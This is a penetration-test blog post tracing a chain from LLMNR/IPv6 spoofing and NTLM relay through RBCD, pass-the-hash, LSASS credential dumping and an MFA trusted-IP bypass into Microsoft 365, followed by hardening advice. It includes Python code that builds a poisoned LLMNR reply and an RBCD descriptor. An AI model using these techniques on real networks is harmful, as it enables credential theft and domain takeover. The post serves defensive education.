A Sneak Peek Into The Lateral Movement From On-Premises To M365

Welcome to RBT’s second blog post, in which we walk through a recent internal penetration test for one of our clients and explain how domain administrators can harden their Active Directory (AD) and Microsoft 365 environments.

Our client was diligent about security, including timely installation of security patches, so our assessment focused mainly on finding misconfigurations through manual testing. During the investigation we found that hosts on the network relied on three mechanisms that attackers routinely abuse: Link-Local Multicast Name Resolution (LLMNR), NetBIOS Name Service (NBT-NS), and Internet Protocol version 6 (IPv6).

Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as fallback methods of host name resolution when DNS fails. LLMNR is based on the Domain Name System (DNS) message format and lets hosts on the same local link resolve names for each other; NBT-NS identifies systems on the local network by their NetBIOS name. Both are multicast or broadcast protocols with no authentication, so any host on the segment can answer a query. An adversary who answers first, claiming to be the requested host, forces the victim to connect to an attacker-controlled system and authenticate with NTLM, and that authentication material can then be captured for offline cracking or relayed to another service.
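The exchange described above at the packet level, as an added example that is not part of the original post: the victim's LLMNR query for a name DNS could not resolve, and the reply a poisoner (this is what tools such as Responder do) sends back with its own address. Everything is built and parsed with the Python standard library and nothing is sent on the wire; the name "fileserver01", the transaction ID and the attacker address 10.0.0.66 are constructed sample values.

```python
"""LLMNR poisoning, shown as a packet-level exchange (added example, standard library only)."""
import struct

LLMNR_PORT = 5355            # UDP, multicast to 224.0.0.252 / ff02::1:3
QTYPE_A, QCLASS_IN = 1, 1
FLAG_RESPONSE = 0x8000       # QR bit in the DNS-style flags word


def encode_name(name: str) -> bytes:
    """DNS wire format: length-prefixed labels, terminated by a zero byte."""
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"


def decode_name(pkt: bytes, offset: int):
    """Return (name, offset just after the name). LLMNR messages do not use compression pointers."""
    labels = []
    while True:
        length = pkt[offset]
        offset += 1
        if length == 0:
            break
        labels.append(pkt[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), offset


def build_query(txid: int, name: str) -> bytes:
    """What a Windows host multicasts when a name is not found in DNS (constructed sample)."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)   # ID, flags, QD, AN, NS, AR
    return header + encode_name(name) + struct.pack(">HH", QTYPE_A, QCLASS_IN)


def parse_query(pkt: bytes):
    """Return (txid, name, qtype, qclass) for a query, or None for anything else."""
    txid, flags, qdcount, _, _, _ = struct.unpack_from(">HHHHHH", pkt, 0)
    if flags & FLAG_RESPONSE or qdcount != 1:
        return None
    name, off = decode_name(pkt, 12)
    qtype, qclass = struct.unpack_from(">HH", pkt, off)
    return txid, name, qtype, qclass


def build_poisoned_response(query: bytes, attacker_ip: str, ttl: int = 30) -> bytes:
    """The poisoner's answer: same transaction ID, question echoed back, one A record pointing at us.
    LLMNR has no authentication, so the victim accepts the first reply whose ID and name match."""
    parsed = parse_query(query)
    if parsed is None or parsed[2] != QTYPE_A:
        return b""
    txid, name, qtype, qclass = parsed
    header = struct.pack(">HHHHHH", txid, FLAG_RESPONSE, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack(">HH", qtype, qclass)
    rdata = bytes(int(octet) for octet in attacker_ip.split("."))
    answer = encode_name(name) + struct.pack(">HHIH", qtype, qclass, ttl, 4) + rdata
    return header + question + answer


def parse_response(pkt: bytes):
    """What the victim's resolver extracts from the reply: (txid, name, ip)."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack_from(">HHHHHH", pkt, 0)
    if not flags & FLAG_RESPONSE or ancount < 1:
        return None
    off = 12
    for _ in range(qdcount):                 # skip the echoed question section
        _, off = decode_name(pkt, off)
        off += 4
    name, off = decode_name(pkt, off)
    rtype, _rclass, _ttl, rdlen = struct.unpack_from(">HHIH", pkt, off)
    off += 10
    ip = ".".join(str(b) for b in pkt[off:off + rdlen]) if rtype == QTYPE_A else None
    return txid, name, ip


if __name__ == "__main__":
    victim_query = build_query(0x1A2B, "fileserver01")           # constructed sample query
    reply = build_poisoned_response(victim_query, "10.0.0.66")   # attacker address (assumed)
    print(parse_response(reply))
```

Once the victim believes 10.0.0.66 is fileserver01 it opens an SMB session to it and authenticates with NTLM, which is the challenge-response the poisoner captures or relays. A real poisoner also answers NBT-NS queries and AAAA lookups; this example only shows the A-record case.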

IPv6 DNS spoofing. Windows Vista and later enable IPv6 by default and prefer it over IPv4. Windows hosts periodically solicit DHCPv6 configuration, and if no legitimate DHCPv6 server answers, a rogue host on the segment can reply and assign itself as the victims' DNS server. From then on the attacker controls name resolution for those hosts and can direct their authentication attempts to a system it controls, without touching the IPv4 network at all.

Our team carried out this IPv6 DNS spoofing attack and captured several NetNTLMv2 challenge-response hashes. Cracking them offline recovered clear-text passwords, which revealed weak user passwords in the environment.

Next we used the same IPv6 foothold for NTLM relay. Instead of cracking, we forwarded the captured authentication to LDAP on a domain controller and used the authenticated session to create a new computer account and to write that account into the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of two domain-joined computers: a Resource-Based Constrained Delegation (RBCD) attack.

Resource-Based Constrained Delegation (RBCD) is available in Windows Server 2012 and later. Unlike classic constrained delegation, which a domain administrator configures on the front-end service account, RBCD is configured on the target resource itself: the back-end computer's msDS-AllowedToActOnBehalfOfOtherIdentity attribute lists which accounts may act on behalf of other users when talking to it. This gives resource owners finer control over delegation, but it also means that anyone who can write that attribute, including the computer account itself, decides who may impersonate users to that host. That is exactly what the relayed authentication gave us.

Using the new computer account's credentials, we requested a Ticket Granting Ticket (TGT) for it and then used the S4U2Self and S4U2Proxy Kerberos extensions to obtain service tickets to the two computers while impersonating an account with local administrator rights on them. With that access we dumped the local account hashes (SAM) and collected more than 10 NTLM password hashes from the two domain-joined computers.
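The attribute behind the RBCD step above, as an added example that is not part of the original post and serves both the attack (what the relay writes) and the defender's check (what to read back). msDS-AllowedToActOnBehalfOfOtherIdentity holds a binary, self-relative Windows security descriptor; RBCD tooling writes one whose DACL grants the attacker's computer account an ACCESS_ALLOWED ACE, and a defender decodes the DACL to list the SIDs that may delegate. The code uses only the Python standard library; the domain and account SIDs are constructed sample values, and the access mask is the one RBCD tooling commonly writes.

```python
"""RBCD: build and decode the msDS-AllowedToActOnBehalfOfOtherIdentity security descriptor
(added example, standard library only)."""
import struct

ACCESS_ALLOWED_ACE_TYPE = 0x00
ACL_REVISION_DS = 4
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
FULL_CONTROL = 0x000F01FF          # mask commonly written by RBCD tooling (assumed value)
BUILTIN_ADMINS = "S-1-5-32-544"    # owner "BA" in the SDDL form O:BAD:(A;;...;;;<SID>)


def sid_to_bytes(sid: str) -> bytes:
    """String SID (S-1-5-21-...) to its binary form: revision, count, 48-bit authority, subauthorities."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S" or parts[1] != "1":
        raise ValueError("not a SID: %r" % sid)
    authority = int(parts[2]).to_bytes(6, "big")
    subs = [int(p) for p in parts[3:]]
    return bytes([1, len(subs)]) + authority + struct.pack("<%dI" % len(subs), *subs)


def bytes_to_sid(buf: bytes, offset: int = 0):
    """Binary SID at offset to (string SID, size in bytes)."""
    revision, count = buf[offset], buf[offset + 1]
    authority = int.from_bytes(buf[offset + 2:offset + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, offset + 8)
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs), 8 + 4 * count


def build_rbcd_descriptor(allowed_sids) -> bytes:
    """Self-relative SECURITY_DESCRIPTOR: 20-byte header, owner SID, DACL with one allow ACE per SID.
    This is the value an attacker writes to the target computer's attribute over LDAP."""
    aces = b""
    for sid in allowed_sids:
        sid_b = sid_to_bytes(sid)
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), FULL_CONTROL) + sid_b
    dacl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    owner = sid_to_bytes(BUILTIN_ADMINS)
    owner_off = 20
    dacl_off = owner_off + len(owner)
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         owner_off, 0, 0, dacl_off)   # revision, sbz1, control, owner, group, sacl, dacl
    return header + owner + dacl


def allowed_to_act(descriptor: bytes):
    """Defender's view: (SID, mask) for every ACCESS_ALLOWED ACE in the DACL.
    Any SID here that was not deliberately configured, especially a newly created
    computer account, is the RBCD attack in progress."""
    _rev, _sbz, control, _own, _grp, _sacl, dacl_off = struct.unpack_from("<BBHIIII", descriptor, 0)
    if not control & SE_DACL_PRESENT or dacl_off == 0:
        return []
    _, _, _size, ace_count, _ = struct.unpack_from("<BBHHH", descriptor, dacl_off)
    pos, grants = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _flags, ace_size, mask = struct.unpack_from("<BBHI", descriptor, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sid, _ = bytes_to_sid(descriptor, pos + 8)
            grants.append((sid, mask))
        pos += ace_size
    return grants


if __name__ == "__main__":
    # Constructed sample: the attacker's new computer account (RID 1105) in a sample domain.
    evil_computer = "S-1-5-21-1004336348-1177238915-682003330-1105"
    sd = build_rbcd_descriptor([evil_computer])
    print(allowed_to_act(sd))
```

In a live domain the attribute is read over LDAP, for example with `Get-ADComputer <host> -Properties msDS-AllowedToActOnBehalfOfOtherIdentity`; the returned descriptor is what `allowed_to_act` decodes. A practical detection is to alert on any write to this attribute (Directory Service Changes auditing, event ID 5136) and on any non-empty value on hosts that were never meant to accept delegation.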

Those hashes did not need cracking: an NTLM hash can be used directly for SMB authentication (pass-the-hash), which makes it a ready-made stepping stone for lateral movement. Spraying the recovered local administrator hash across the network gave us administrative access to more than 30 computers, showing that the same local administrator password was reused on all of them, a critical lapse that opened the next phase of the attack.

In a real-world intrusion the hard part is usually obtaining valid domain credentials. Here a clear-text password was stored in the description attribute of a user account, an attribute every authenticated domain user can read. With that account we ran BloodHound, which collects AD group memberships, sessions and ACLs and graphs attack paths that would be impractical to find by hand.

The most significant breakthrough of the post-exploitation phase came from the Local Security Authority Subsystem Service (LSASS). LSASS caches the credentials of users logged on to a host, and a misconfiguration left them recoverable in clear text: with local administrator rights we read more than 15 domain users' clear-text credentials out of LSASS memory on the compromised hosts, giving us a detailed picture of the environment.

With those passwords we enumerated the users in BloodHound and found two who were members of the Remote Desktop Users group on the domain controllers. Logging in over RDP with their credentials gave us access to the domain controllers, where we found sensitive and business-critical data.

Further enumeration showed that the client used Microsoft Entra ID (formerly Azure Active Directory) and the Microsoft 365 suite. The legacy "trusted IPs" setting of Microsoft Entra multi-factor authentication skips the MFA prompt for sign-ins coming from listed IP ranges, and the client's own egress addresses were on that list. By routing our sign-ins through a compromised internal host with a SOCKS proxy, our traffic appeared to come from the trusted range and no MFA prompt was presented. This gave us access to more than 15 users' Microsoft 365 accounts, including Outlook, SharePoint and calendars.

With the client's permission, we used the instructions found in an unencrypted email in one of those mailboxes to reset one user's password. That account gave us access, from the internet, to one of the client's most critical web applications: a Progress product used to manage their internal infrastructure.

During the week-long engagement we examined the internal network thoroughly, aiming to identify even minor vulnerabilities and to improve the client's security posture. The chain above shows how individually small issues (fallback name resolution, a reused local password, a password in a description field, an MFA exemption for the corporate network) combine into full compromise of both the on-premises domain and Microsoft 365. Our recommendations:

  • Require multi-factor authentication (MFA) for every sign-in in Microsoft Entra, from trusted and untrusted networks alike. Retire the legacy per-user MFA "trusted IPs" setting in favour of Conditional Access, and do not exempt corporate IP ranges: once an attacker is inside the network, an exemption for that network is an MFA bypass.
  • Never store passwords in the description field or any other attribute of an AD object; these are readable by every authenticated user.
  • Encrypt sensitive emails, such as password reset instructions, so a compromised mailbox does not expose them.
  • Disable LLMNR and NBT-NS via Group Policy. For IPv6, if it is not in use, block DHCPv6 and router advertisements from untrusted hosts at the host firewall (or disable IPv6 where that is acceptable) rather than leaving it enabled but unmanaged. Enforce SMB signing and LDAP signing with channel binding so that captured NTLM authentication cannot be relayed.
  • Do not reuse passwords across the internal network; give every host a unique local administrator password (for example with Windows LAPS) so one dumped hash does not open 30 machines.
  • Establish strong credential policies within the internal infrastructure, including length requirements that resist the offline cracking of captured NetNTLMv2 hashes.
  • Enable Windows Defender Credential Guard so that domain credentials held by LSASS are isolated and cannot be dumped even with local administrator rights. Note that Credential Guard does not protect local account hashes in the SAM, which is why unique local passwords matter as well.

Our penetration test helped our client identify specific vulnerabilities and provided practical recommendations for proactive security measures. These insights can guide our clients to strengthen their security measures and establish a resilient defense against potential threats.

Join us on our next adventure through the digital realm, where we continue to help organizations strengthen their security. Keep an eye out for upcoming blog posts like this one!


Authors

  • Asif Khan

    Highly skilled Pentester with experience in various areas, including multi-clouds (AWS, Azure, and GCP), network, web applications, APIs, and mobile penetration testing. In addition, he is passionate about conducting Red and Purple Team assessments and developing innovative solutions to protect company systems and data.

  • Chanel Carr

    Professional security architect for multiple clouds, including Amazon Web Services (AWS), Microsoft Azure and Google Cloud Platform (GCP), with experience evaluating and testing computer security systems, building firewalls and improving network security.
